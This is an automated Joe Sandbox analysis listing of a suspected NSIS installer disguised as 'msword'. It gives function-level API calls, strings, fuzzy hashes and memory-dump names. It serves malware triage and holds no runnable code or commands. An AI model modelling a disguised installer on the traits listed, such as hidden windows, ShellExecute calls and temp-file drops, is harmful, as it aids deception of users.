Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user abort, xrefs: 00401B53
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
API String ID: 4286501637-1929300520
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

soft, xrefs: 00403675
Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Null, xrefs: 0040367E

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

... %d%%, xrefs: 0040349E
X1C, xrefs: 0040343C
X1C, xrefs: 004033ED
P1B, xrefs: 004033A9

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNEL32(007F0458), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
API String ID: 1459762280-187782834
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3745045155
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
